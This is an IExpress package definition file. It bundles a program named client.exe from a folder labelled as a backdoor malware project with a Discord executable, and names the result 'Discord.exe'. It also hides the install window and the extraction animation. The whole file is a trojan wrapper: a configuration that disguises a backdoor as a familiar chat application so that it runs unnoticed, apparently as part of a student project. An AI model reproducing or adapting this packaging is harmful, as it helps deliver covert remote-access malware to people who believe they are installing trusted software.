[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=ExtractOnly
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=I
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=D:\projects\S4-Specialisation-main\Malware programs\Backdoor\dist\client.exe
FriendlyName=Discord.exe
AppLaunched=
PostInstallCmd=
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="DISCOR~1.EXE"
FILE1="client.exe"
[SourceFiles]
SourceFiles0=C:\Users\goert\Desktop\
SourceFiles1=D:\projects\S4-Specialisation-main\Malware programs\Backdoor\dist\
[SourceFiles0]
%FILE0%=
[SourceFiles1]
%FILE1%=
